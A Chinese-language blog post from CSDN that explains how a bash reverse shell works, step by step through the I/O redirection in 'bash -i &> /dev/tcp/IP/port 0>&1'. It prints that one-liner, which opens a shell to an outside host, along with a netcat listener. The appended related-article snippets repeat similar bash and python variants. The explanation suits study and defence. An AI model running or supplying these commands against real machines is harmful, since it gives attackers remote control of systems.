彻底理解bash反弹shell

最新推荐文章于 2022-09-14 22:12:56 发布
最新推荐文章于 2022-09-14 22:12:56 发布
阅读量2.5k 收藏 9
点赞数 5
分类专栏: 安全 文章标签: bash 反弹shell I/O重定向
友链:https://cutt.ly/7777aaaa
本文链接:https://blog.csdn.net/include_heqile/article/details/85011135
版权

友链

关注微信公众号回复关键字【资料】获取各种学习资料

在这里插入图片描述

bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求

公网主机:
	nc -lvvp 9090
肉鸡执行:
	bash -i &> /dev/tcp/144.34.164.217/9090 0>&1
		其中144.34.164.217为自己的公网主机

对命令的解释:

bash -i意为创建一个交互式的bash shell
&>意为将标准输出和标准错误都重定向到我们指定的文件中

实验如下:

x@DESKTOP-GR9LS16:~$ cat 1
cat: 1: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 2
cat: 2: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 1 > 2
cat: 1: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 1 &> 2
x@DESKTOP-GR9LS16:~$ cat 2
cat: 1: No such file or directory

x@DESKTOP-GR9LS16:~$ cat 1
I get some words here!!
x@DESKTOP-GR9LS16:~$ cat 2
cat: 2: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 1 &> 2
x@DESKTOP-GR9LS16:~$ cat 2
I get some words here!!

可以看到标准错误和标准输出都被重定向到了文件2

至于后面的/dev/tcp/144.34.164.217/9090,这是一个特殊文件,它会建立一个连接到到144.34.164.217:9090的socket

最后一个0>&1,意为将文件描述符0重定向到文件描述符1,也就是标准输入被重定向到了标准输出

我们来分析一下,首先&>使得标准输出重定向到了我们的TCP连接上,然后0>&1使得标准输入又重定向到了标准输出中,最终的结果就是标准输入也被重定向到了TCP连接中,因此输入和输出都可以在公网主机上进行,通过TCP连接和bash进行交互

为加深理解,我们来看一下不加0>&1的效果:

在这里插入图片描述

可以看到,标准输出通过tcp连接到了公网主机上,因为标准输入在肉鸡上,所以命令只能在肉鸡终端上才能执行,当然这样的shell是没有任何意义的

「已注销」
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux bash shell中文手册
05-03
1.概述 (SYNOPSIS) 2.版权所有 (COPYRIGHT) 3.描述 (DESCRIPTION) 4.选项 (OPTIONS) 5.参数 (ARGUMENTS) 6.启动 (INVOCATION) 7.定义 (DEFINITIONS) 8.保留字 ("RESERVED WORDS") 9.注释 (COMMENTS) 10.引用 (QOUTING) 11.参数 (PARAMETERS) 12.扩展 ( EXPANSION) 12.7 Word Splitting 13.重定向 (REDIRECTION) 14. 别名(ALIASES) 15. 函数)(FUNCTIONS) 16. 算术求值("ARITHMETIC EVALUATION") 17. 条件表达式("CONDITIONAL EXPRESSIONS") 18. 简单命令扩展("SIMPLE COMMAND EXPANSION") 19. 命令执行(COMMAND EXECUTION) 20. 命令执行环境(COMMAND EXECUTION ENVIRONMENT) 21. 环境(ENVIRONMENT) 22. 退出
浅析Linux之bash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
Linux命令——bash
weixin_34007906的博客
11-12 468
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell! 基本使用语法 1 bash-c命令 1 2 3 root@kali:~#bash-cwhoami root root@kali:~# 另外使用-i表示以交互方式运...
渗透中反弹shell与端口
千寻的博客
01-03 1801
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shellbash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)
weixin_43803070的博客
07-10 2127
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境: CentOS 6.5:192.168...
反弹shell bash -i命令
m0_37638874的博客
09-07 3591
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
【转】Linux之bash反弹shell原理浅析
mastergu2的博客
11-04 2143
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
对于反弹shell语句bash命令的理解
WihauShe's Blogger
03-10 743
(个人经验,仅供参考,错误之处,敬请谅解) 缘由   在学习Wen渗透过程中,遇到了“反弹shell” 这个专业名词。于是查询找到了整个反弹shell的过程,但对于其中第一条命令尤其不解. bash -i >& /dev/tcp/[ip]/[port] 0>&1 经过   起初如果搜这个bash命令,很难找到这个命令和反弹sh...
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1618
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
使用本机反弹shell
meteox的博客
09-04 612
有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面 我一般用natapp,使用起来比较简单方便 注册完成后配置下隧道本地要映射的端口 http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。 tcp隧道根据你要监听的端口进行设置。 我这里tcp隧道的本地端口设置为1516。 下载它的客户端后直接在终端中执行命令 ./natapp -authtoken=你的authtoken 可以得到映射后的地址和端
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc...[ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
bash shell命令(一)
01-20
在命令上 输入 init 3 命令 切换到dos界面 (文本模式) 输入 init 5命令 切换到图形界面 Shift+Ctrl+N 创建一个新的文件夹,在现有的窗口的新标签中启动一个新的shell...默认bash shell提示符是美元符号( $),这个
多种姿势反弹shell
Brucetg的博客
08-20 7020
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 简单解释下: bash ...
解决kali-linux更新源无法使用的问题(签名失效)
热门推荐
include_heqile的博客
02-07 3万+
本来说是这个寒假好好学习一下渗透测试的,可随着了解的深入,发现渗透测试需要的知识储备太多了,因此好长时间都没有真正的去学习渗透工具的使用,今天上午装了一个kali,装上之后第一件事就是执行apt-get update && apt-get upgrade,结果却出现了这样的错误 我添加的是中科大的更新源,在浏览器中是可以正常打开的: deb http://mirrors.ustc.ed
Amass使用方法
include_heqile的博客
04-19 1万+
简介 Amss官网地址 github地址 不管你是安全研究人员还是运维人员,你都有将本组织的外部攻击面映射出来的需求。这个映射其实说白了就是信息搜集和侦察。 OWASP的Amass项目可以在很大程度上帮助您的组织完成这项工作,这具体取决于您的需求。这篇文章中我们将会着重讲解如何使用Amass去搜集一个组织的外部资产。 我们着重讲解子域名发现技术。我们将这篇文章分成了几部分...
钓鱼框架 GoPhish的使用介绍
include_heqile的博客
04-21 6087
官网地址 windows版本高速下载连接 该钓鱼框架基于go语言进行编写,解压缩后直接运行gophish.exe即可 然后访问:https://127.0.0.1:3333 默认凭证:admin/gophish 创建Users & Groups 这个是用来设置你要发送邮件的收件人地址 编辑email template 这个是用来编辑邮件的 landing pages sending ...
实验吧 简单的登录题 CBC字节翻转攻击
include_heqile的博客
04-15 5280
本文CBC脚本部分参考了:http://hebin.me/2018/01/26/西普ctf-简单的登录题/ 首先对这道题进行了抓包 在抓包的时候,看到了这个: 直接在浏览器地址栏中输入URL:http://ctf5.shiyanbar.com/web/jiandan/test.php 将代码粘贴到编辑器中,格式化代码: <?php define("SECRET_KEY"...
HTTP隧道端口转发之Abptts实战
include_heqile的博客
12-14 4439
实验时可能需要把windows10的防火墙关掉,不然无法建立连接,因为默认网站无法被外部电脑访问 环境: 靶机: windows10 模拟公网IP:192.168.31.121 模拟内网IP:192.168.126.1 kali 内网IP:192.168.126.128 windows8 内网ip:192.168.126.129 攻击机: kali 模拟公网IP:...
Hydra教程——非常详细
include_heqile的博客
05-26 3377
首先介绍一下Hydra所支持的协议 Cisco AAA Cisco auth Cisco enable CVS FTP HTTP(S)-FROM-GET HTTP(S)-FROM-POST HTTP(S)-GET HTTP(S)-HEAD HTTP(S)-Proxy ICQ IMAP IRC LDAP MS-SQL MySQL NNTP Oracle Listener Oracle SID PC-Anywhere PC-NFS POP3 PostgreSQL RDP Rexec Rlogin Rsh SI
bash反弹shell
最新发布
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机上运行一个反弹shell命令,该命令将连接到攻击者本地主机上的监听程序。这样,攻击者就可以在本地主机上执行命令,并将结果发送回远程主机上的反弹shell。 值得注意的是,使用Bash反弹shell是一种攻击行为,严重违反了计算机安全和道德规范,因此不应该进行此类行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值